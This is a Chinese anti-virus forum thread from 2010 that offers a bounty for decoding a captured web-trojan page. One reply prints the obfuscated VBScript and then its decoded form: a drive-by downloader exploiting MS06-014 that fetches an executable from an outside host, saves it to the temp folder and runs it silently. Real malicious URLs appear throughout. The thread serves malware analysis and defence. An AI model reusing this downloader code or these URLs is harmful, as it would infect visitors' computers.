瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第四十三期(已结束)

1   1  /  1  页   跳转

[悬赏] 网马解密悬赏第四十三期(已结束)

网马解密悬赏第四十三期(已结束)

http://www.qu123.com/htm/movie/11744/p.htm



引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
最后编辑networkedition 最后编辑于 2010-01-05 17:27:36
分享到:
gototop
 

回复: 网马解密悬赏第四十三期

源文件见附件。

附件附件:

文件名:p.rar
下载次数:506
文件类型:application/octet-stream
文件大小:
上传时间:2010-1-5 14:31:31
描述:rar

gototop
 

回复:网马解密悬赏第四十三期

先是htmlship解密,得到如下结果

<html><head><scripT LaNGuagE=jAvascripT><html>
<body>
<script type="text/jscript">
function init() {
document.write("");}
window.onload = init;
</script>
<script language="VBScript">
S="0D0A6F6E206572726F7220726573756D65206E6578740D0A"
S=S+"666E616D65313D2270652E657865220D0A666E616D65323D2270652E766273220D0A"
S=S+"536574206466203D20646F63756D656E742E637265617465456C656D656E7428226F626A65637422290D0A64662E7365744174747269627574652022636C6173736964222C2022636C7369643A42443936433535362D363541332D313144302D39383341"
S=S+"2D303043303446433239453336220D0A7374723D224D6963726F736F66742E584D4C48545450220D0A5365742078203D2064662E4372656174654F626A656374287374722C2222290D0A43313D2241646F220D0A43323D2264622E220D0A43333D227374"
S=S+"72220D0A43343D2265616D220D0A737472313D43312643322643332643340D0A737472353D737472310D0A7365742053203D2064662E6372656174656F626A65637428737472352C2222290D0A532E74797065203D20310D0A737472363D22474554220D"
S=S+"0A782E4F70656E20737472362C206375726C2C2046616C73650D0A782E53656E640D0A73313D22536372697074220D0A73323D22696E672E220D0A73333D2246696C65220D0A73343D2253797374656D4F626A656374220D0A73303D73312B73322B7333"
S=S+"2B73340D0A7365742046203D2064662E6372656174656F626A6563742873302C2222290D0A73657420746D70203D20462E4765745370656369616C466F6C6465722832290D0A666E616D65313D20462E4275696C645061746828746D702C666E616D6531"
S=S+"290D0A532E6F70656E0D0A532E777269746520782E726573706F6E7365426F64790D0A532E73617665746F66696C6520666E616D65312C320D0A532E636C6F73650D0A666E616D65323D20462E4275696C645061746828746D702C666E616D6532290D0A"
S=S+"536574207473203D20462E4F70656E5465787446696C6528666E616D65322C20322C2054727565290D0A74732E57726974654C696E652022536574205368656C6C203D204372656174654F626A6563742822225368656C6C2E4170706C69636174696F6E"
S=S+"222229220D0A73716C3D225368656C6C2E5368656C6C45786563757465202222222B666E616D65312B2222222C222222222C222222222C22226F70656E22222C30220D0A74732E57726974654C696E652073716C0D0A74732E636C6F73650D0A69662046"
S=S+"2E46696C6545786973747328666E616D6531293D74727565207468656E0D0A696620462E46696C6545786973747328666E616D6532293D74727565207468656E0D0A202020207365742051203D2064662E6372656174656F626A65637428225368656C6C"
S=S+"2E4170706C69636174696F6E222C2222290D0A20202020512E5368656C6C4578656375746520666E616D65322C22222C22222C226F70656E222C300D0A656E642069660D0A656E642069660D0A"
D=""
DO WHILE LEN(S)>1
    k="&H"+LEFT(S,2)
    p=CLng(k)
    m=chr(p)
    D=D&m
    S=MID(S,3)
LOOP
uurl="http://www.1sto.com/popwin/soft/2fac3f168520c15f.exe"
stu="curl=""" & uurl & """"
D=stu&D
EXECUTE D
</script>
</body>
</html>
<table border=0 width=100% height=25 cellspacing=0 cellpadding=0><tr><td width=75% height=19><blink><marquee>The page is protected by CryptHtml</marquee></blink></td><td width=25% height=19><strong><a href=http://www.flashpeak.com/crypthtml/register.htm>Power by CryptHtml</a></strong></td></tr></table></script></head><body><noscript><b><font color=red>This page requires a javascript enabled browser!!!</font></b></noscript></body></html>


然后是针对VBS的解密,把

EXECUTE D


msgbox一下,如果不能显示全的话,就FSO写入到TXT文件也是可以的,得到如下结果

curl="http://www.1sto.com/popwin/soft/2fac3f168520c15f.exe"
on error resume next
fname1="pe.exe"
fname2="pe.vbs"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
C1="Ado"
C2="db."
C3="str"
C4="eam"
str1=C1&C2&C3&C4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, curl, False
x.Send
s1="Script"
s2="ing."
s3="File"
s4="SystemObject"
s0=s1+s2+s3+s4
set F = df.createobject(s0,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
Set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Shell.Application"")"
sql="Shell.ShellExecute """+fname1+""","""","""",""open"",0"
ts.WriteLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname2,"","","open",0
end if
end if


MS06014漏洞
本帖被评分 1 次
最后编辑Cool_wXd 最后编辑于 2010-01-05 17:08:56
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT